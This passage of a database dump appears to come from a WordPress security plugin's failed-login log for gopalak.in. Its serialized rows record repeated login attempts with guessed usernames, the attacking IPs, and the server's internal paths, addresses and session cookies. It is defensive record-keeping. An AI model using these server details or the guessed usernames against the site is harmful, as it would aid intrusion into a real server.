Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40356\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.172\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744968929.8787651;s:12:\"REQUEST_TIME\";i:1744968929;}}','199.188.201.172',0,'2025-04-18 15:05:31','1970-01-01 00:00:00'),(93783,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57020\";s:11:\"REMOTE_ADDR\";s:14:\"208.107.66.243\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744969597.2995369;s:12:\"REQUEST_TIME\";i:1744969597;}}','208.107.66.243',0,'2025-04-18 15:16:39','1970-01-01 00:00:00'),(93784,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46878\";s:11:\"REMOTE_ADDR\";s:14:\"107.172.243.11\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744970268.041636;s:12:\"REQUEST_TIME\";i:1744970268;}}','107.172.243.11',0,'2025-04-18 15:27:49','1970-01-01 00:00:00'),(93785,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWgCIkukTG9gBGl8Ag==; PHPSESSID=f866e8ac38ebbcbb0a518608d1e685ef; wordpress_test_cookie=WP%20Cookie%20check; swpm_session=f0885a776015e6387be414bcd0704736\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"141\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"107.189.30.151\";s:14:\"HTTP_X_REAL_IP\";s:14:\"107.189.30.151\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"107.189.30.151\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"141\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744970336.6514051;s:12:\"REQUEST_TIME\";i:1744970336;}}','107.189.30.151',0,'2025-04-18 15:28:58','1970-01-01 00:00:00'),(93786,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWgCItukTG9gBGpmAg==; PHPSESSID=e69ca1ee9ffbe63fd19dceae10dad171; wordpress_test_cookie=WP%20Cookie%20check; swpm_session=aaaf72390eb7315d61b9af741174f19f\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"135\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"107.189.30.151\";s:14:\"HTTP_X_REAL_IP\";s:14:\"107.189.30.151\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"107.189.30.151\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"135\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744970476.9474969;s:12:\"REQUEST_TIME\";i:1744970476;}}','107.189.30.151',0,'2025-04-18 15:31:18','1970-01-01 00:00:00'),(93787,0,'a:2:{s:8:\"username\";s:1:\"a\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWgCI2mkTG9gBGtdAg==; PHPSESSID=f976dd9c0d87ee35cfd33bf53d6e9774; wordpress_test_cookie=WP%20Cookie%20check; swpm_session=aab203d88923316f3716725e82ebbfee\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"107.189.30.151\";s:14:\"HTTP_X_REAL_IP\";s:14:\"107.189.30.151\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"107.189.30.151\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744970619.342586;s:12:\"REQUEST_TIME\";i:1744970619;}}','107.189.30.151',0,'2025-04-18 15:33:40','1970-01-01 00:00:00'),(93788,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWgCI/OisG9fA0lFAg==; PHPSESSID=52a1cf8d94acb6501a980ab6a0324791; wordpress_test_cookie=WP%20Cookie%20check; swpm_session=ece0cca57742488ddf3912a18eae3fcd\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"107.189.30.151\";s:14:\"HTTP_X_REAL_IP\";s:14:\"107.189.30.151\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"107.189.30.151\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744970752.871412;s:12:\"REQUEST_TIME\";i:1744970752;}}','107.189.30.151',0,'2025-04-18 15:35:54','1970-01-01 00:00:00'),(93789,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWgCJHWkTG9gBG02Ag==; PHPSESSID=ff813af7f5efeeb8918e99a5f7e25bd4; wordpress_test_cookie=WP%20Cookie%20check; swpm_session=07bd5cd4034a901723d35afa1971b8c5\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"129\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"107.189.30.151\";s:14:\"HTTP_X_REAL_IP\";s:14:\"107.189.30.151\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"107.189.30.151\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"129\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744970880.4861641;s:12:\"REQUEST_TIME\";i:1744970880;}}','107.189.30.151',0,'2025-04-18 15:38:02','1970-01-01 00:00:00'),(93790,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53052\";s:11:\"REMOTE_ADDR\";s:13:\"164.160.91.19\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744970939.9975419;s:12:\"REQUEST_TIME\";i:1744970939;}}','164.160.91.19',0,'2025-04-18 15:39:01','1970-01-01 00:00:00'),(93791,0,'a:2:{s:8:\"username\";s:1:\"m\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWgCJOuisG9fA0mfAg==; PHPSESSID=be992ad9c001ed72bfc942b403c4423a; wordpress_test_cookie=WP%20Cookie%20check; swpm_session=1a302730a251a9e9f98dec507991be2f\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"107.189.30.151\";s:14:\"HTTP_X_REAL_IP\";s:14:\"107.189.30.151\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"107.189.30.151\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744970988.0664041;s:12:\"REQUEST_TIME\";i:1744970988;}}','107.189.30.151',0,'2025-04-18 15:39:49','1970-01-01 00:00:00'),(93792,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"95\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 